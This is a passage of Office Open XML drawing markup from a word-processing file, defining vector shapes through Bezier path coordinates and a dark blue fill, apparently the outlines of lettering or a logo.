                                  <a:pt x="27825" y="29101"/>
                                  <a:pt x="31052" y="29101"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="33426" y="28389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33426" y="39881"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25083" y="41332"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17310" y="41332"/>
                                  <a:pt x="11188" y="39490"/>
                                  <a:pt x="6718" y="35833"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2248" y="32162"/>
                                  <a:pt x="0" y="27539"/>
                                  <a:pt x="0" y="21938"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="18230"/>
                                  <a:pt x="1029" y="14928"/>
                                  <a:pt x="3061" y="12020"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5093" y="9124"/>
                                  <a:pt x="7950" y="6890"/>
                                  <a:pt x="11621" y="5352"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15291" y="3803"/>
                                  <a:pt x="20587" y="2457"/>
                                  <a:pt x="27496" y="1301"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="33426"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08" name="Shape 108"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4155196" y="331441"/>
                            <a:ext cx="31356" cy="21231"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="31356" h="21231">
                                <a:moveTo>
                                  <a:pt x="31356" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="31356" y="13035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31255" y="13015"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="27699" y="13015"/>
                                  <a:pt x="24930" y="13624"/>
                                  <a:pt x="22936" y="14843"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20955" y="16049"/>
                                  <a:pt x="19342" y="18183"/>
                                  <a:pt x="18110" y="21231"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="18386"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2032" y="12049"/>
                                  <a:pt x="5537" y="7350"/>
                                  <a:pt x="10503" y="4302"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="31356"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09" name="Shape 109"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3946408" y="331171"/>
                            <a:ext cx="68758" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68758" h="67081">
                                <a:moveTo>
                                  <a:pt x="43396" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="47803" y="0"/>
                                  <a:pt x="51829" y="698"/>
                                  <a:pt x="55474" y="2070"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="59118" y="3454"/>
                                  <a:pt x="61875" y="5220"/>
                                  <a:pt x="63754" y="7353"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="65621" y="9499"/>
                                  <a:pt x="66916" y="11925"/>
                                  <a:pt x="67653" y="14643"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="68390" y="17361"/>
                                  <a:pt x="68758" y="21247"/>
                                  <a:pt x="68758" y="26314"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="68758" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48794" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48794" y="33604"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="48794" y="26518"/>
                                  <a:pt x="48374" y="21945"/>
                                  <a:pt x="47523" y="19862"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46672" y="17780"/>
                                  <a:pt x="45288" y="16166"/>
                                  <a:pt x="43371" y="15011"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="41453" y="13856"/>
                                  <a:pt x="39141" y="13284"/>
                                  <a:pt x="36436" y="13284"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32982" y="13284"/>
                                  <a:pt x="29883" y="14109"/>
                                  <a:pt x="27140" y="15760"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24384" y="17399"/>
                                  <a:pt x="22504" y="19583"/>
                                  <a:pt x="21489" y="22301"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20472" y="25019"/>
                                  <a:pt x="19964" y="30048"/>
                                  <a:pt x="19964" y="37376"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18542" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18542" y="11125"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="25121" y="3708"/>
                                  <a:pt x="33414" y="0"/>
                                  <a:pt x="43396" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="110" name="Shape 110"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4076901" y="307701"/>
                            <a:ext cx="69761" cy="90551"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="69761" h="90551">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19965" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19965" y="48057"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="43333" y="24956"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="67907" y="24956"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42126" y="48920"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="69761" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48235" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29273" y="61087"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19965" y="69545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19965" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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11" name="Shape 111"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4396979" y="358407"/>
                            <a:ext cx="33414" cy="41332"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="33414" h="41332">
                                <a:moveTo>
                                  <a:pt x="33414" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="33414" y="11368"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23863" y="14026"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="21260" y="15639"/>
                                  <a:pt x="19952" y="17672"/>
                                  <a:pt x="19952" y="20148"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="19952" y="22574"/>
                                  <a:pt x="20993" y="24669"/>
                                  <a:pt x="23076" y="26447"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25159" y="28212"/>
                                  <a:pt x="27813" y="29101"/>
                                  <a:pt x="31039" y="29101"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="33414" y="28390"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33414" y="39883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25070" y="41332"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17297" y="41332"/>
                                  <a:pt x="11176" y="39490"/>
                                  <a:pt x="6706" y="35833"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2235" y="32162"/>
                                  <a:pt x="0" y="27539"/>
                                  <a:pt x="0" y="21938"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="18230"/>
                                  <a:pt x="1016" y="14928"/>
                                  <a:pt x="3048" y="12020"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5080" y="9124"/>
                                  <a:pt x="7938" y="6890"/>
                                  <a:pt x="11608" y="5352"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15278" y="3803"/>
                                  <a:pt x="20574" y="2457"/>
                                  <a:pt x="27483" y="1301"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="33414"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12" name="Shape 112"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4312016" y="332657"/>
                            <a:ext cx="77559" cy="92215"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="77559" h="92215">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21234" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39269" y="46571"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56883" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="77559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50927" y="63119"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46165" y="74549"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="44412" y="78384"/>
                                  <a:pt x="42736" y="81305"/>
                                  <a:pt x="41161" y="83324"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="39573" y="85344"/>
                                  <a:pt x="37745" y="86982"/>
                                  <a:pt x="35687" y="88226"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="33630" y="89484"/>
                                  <a:pt x="31090" y="90462"/>
                                  <a:pt x="28080" y="91160"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25083" y="91871"/>
                                  <a:pt x="21679" y="92215"/>
                                  <a:pt x="17894" y="92215"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14059" y="92215"/>
                                  <a:pt x="10287" y="91871"/>
                                  <a:pt x="6604" y="91160"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="4826" y="77571"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="7950" y="78117"/>
                                  <a:pt x="10769" y="78384"/>
                                  <a:pt x="13272" y="78384"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="17920" y="78384"/>
                                  <a:pt x="21349" y="77190"/>
                                  <a:pt x="23571" y="74828"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25807" y="72466"/>
                                  <a:pt x="27508" y="69443"/>
                                  <a:pt x="28689" y="65786"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="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1578" name="Shape 11578"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4280304" y="332657"/>
                            <a:ext cx="19964" cy="65595"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="65595">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="114" name="Shape 114"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4399036" y="331441"/>
                            <a:ext cx="31356" cy="21231"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="31356" h="21231">
                                <a:moveTo>
                                  <a:pt x="31356" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="31356" y="13035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31255" y="13015"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="27699" y="13015"/>
                                  <a:pt x="24930" y="13624"/>
                                  <a:pt x="22936" y="14843"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20955" y="16049"/>
                                  <a:pt x="19342" y="18183"/>
                                  <a:pt x="18110" y="21231"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="18386"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2032" y="12049"/>
                                  <a:pt x="5537" y="7350"/>
                                  <a:pt x="10503" y="4302"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="31356"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15" name="Shape 115"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4186552" y="331171"/>
                            <a:ext cx="37402" cy="67117"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="37402" h="67117">
                                <a:moveTo>
                                  <a:pt x="1308" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="10211" y="0"/>
                                  <a:pt x="16840" y="927"/>
                                  <a:pt x="21196" y="2756"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25552" y="4584"/>
                                  <a:pt x="28626" y="6908"/>
                                  <a:pt x="30404" y="9728"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32169" y="12560"/>
                                  <a:pt x="33058" y="17729"/>
                                  <a:pt x="33058" y="25273"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="32855" y="45529"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="32855" y="51295"/>
                                  <a:pt x="33172" y="55537"/>
                                  <a:pt x="33808" y="58280"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34442" y="61023"/>
                                  <a:pt x="35649" y="63957"/>
                                  <a:pt x="37402" y="67081"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="17653" y="67081"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17132" y="65925"/>
                                  <a:pt x="16485" y="64224"/>
                                  <a:pt x="15735" y="61950"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15405" y="60922"/>
                                  <a:pt x="15164" y="60249"/>
                                  <a:pt x="15024" y="59919"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11608" y="62801"/>
                                  <a:pt x="7963" y="64960"/>
                                  <a:pt x="4077" y="66408"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="55625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7912" y="53251"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10338" y="51676"/>
                                  <a:pt x="11925" y="49771"/>
                                  <a:pt x="12675" y="47498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="13195" y="46024"/>
                                  <a:pt x="13462" y="43205"/>
                                  <a:pt x="13462" y="39039"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="13462" y="35585"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10897" y="36322"/>
                                  <a:pt x="6858" y="37211"/>
                                  <a:pt x="1308" y="38240"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="38604"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27236"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13462" y="24282"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13462" y="22555"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="13462" y="19215"/>
                                  <a:pt x="12510" y="16840"/>
                                  <a:pt x="10617" y="15418"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="13305"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="270"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1308"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1579" name="Shape 11579"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4280304" y="307701"/>
                            <a:ext cx="19964" cy="16053"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="16053">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="16053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="16053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="11580" name="Shape 11580"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4239156" y="307701"/>
                            <a:ext cx="19964" cy="90551"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="90551">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="119" name="Shape 119"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4886564" y="332657"/>
                            <a:ext cx="77559" cy="92215"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="77559" h="92215">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21234" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39268" y="46571"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56883" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="77559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50927" y="63119"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46164" y="74549"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="44412" y="78384"/>
                                  <a:pt x="42735" y="81305"/>
                                  <a:pt x="41161" y="83324"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="39573" y="85344"/>
                                  <a:pt x="37744" y="86982"/>
                                  <a:pt x="35687" y="88226"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="33629" y="89484"/>
                                  <a:pt x="31090" y="90462"/>
                                  <a:pt x="28080" y="91160"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25082" y="91871"/>
                                  <a:pt x="21679" y="92215"/>
                                  <a:pt x="17894" y="92215"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14059" y="92215"/>
                                  <a:pt x="10287" y="91871"/>
                                  <a:pt x="6604" y="91160"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="4826" y="77571"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="7950" y="78117"/>
                                  <a:pt x="10769" y="78384"/>
                                  <a:pt x="13271" y="78384"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="17919" y="78384"/>
                                  <a:pt x="21348" y="77190"/>
                                  <a:pt x="23571" y="74828"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25806" y="72466"/>
                                  <a:pt x="27508" y="69443"/>
                                  <a:pt x="28689" y="65786"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="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20" name="Shape 120"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4610593" y="332657"/>
                            <a:ext cx="68606" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68606" h="67081">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19952" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19952" y="30137"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="19952" y="39370"/>
                                  <a:pt x="20320" y="45021"/>
                                  <a:pt x="21056" y="47091"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21793" y="49175"/>
                                  <a:pt x="23127" y="50826"/>
                                  <a:pt x="25070" y="52044"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="27013" y="53251"/>
                                  <a:pt x="29477" y="53860"/>
                                  <a:pt x="32461" y="53860"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35865" y="53860"/>
                                  <a:pt x="38926" y="53047"/>
                                  <a:pt x="41618" y="51422"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="44323" y="49796"/>
                                  <a:pt x="46165" y="47777"/>
                                  <a:pt x="47155" y="45364"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="48158" y="42964"/>
                                  <a:pt x="48654" y="37058"/>
                                  <a:pt x="48654" y="27674"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="48654" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68606" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68606" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50076" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50076" y="55778"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="47320" y="59271"/>
                                  <a:pt x="43713" y="62039"/>
                                  <a:pt x="39243" y="64046"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34760" y="66065"/>
                                  <a:pt x="30048" y="67081"/>
                                  <a:pt x="25070" y="67081"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20002" y="67081"/>
                                  <a:pt x="15456" y="66116"/>
                                  <a:pt x="11430" y="64173"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7404" y="62242"/>
                                  <a:pt x="4496" y="59524"/>
                                  <a:pt x="2692" y="56019"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="902" y="52527"/>
                                  <a:pt x="0" y="47688"/>
                                  <a:pt x="0" y="41504"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="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21" name="Shape 121"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4997371" y="331900"/>
                            <a:ext cx="35840" cy="66353"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="35840" h="66353">
                                <a:moveTo>
                                  <a:pt x="35840" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="35840" y="12083"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28842" y="14625"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="25388" y="17369"/>
                                  <a:pt x="22784" y="21268"/>
                                  <a:pt x="21031" y="26335"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="19279" y="31390"/>
                                  <a:pt x="18402" y="35885"/>
                                  <a:pt x="18402" y="39797"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="18402" y="45029"/>
                                  <a:pt x="19622" y="48878"/>
                                  <a:pt x="22060" y="51341"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24499" y="53818"/>
                                  <a:pt x="27521" y="55049"/>
                                  <a:pt x="31115" y="55049"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="35840" y="53975"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="35840" y="63260"/>
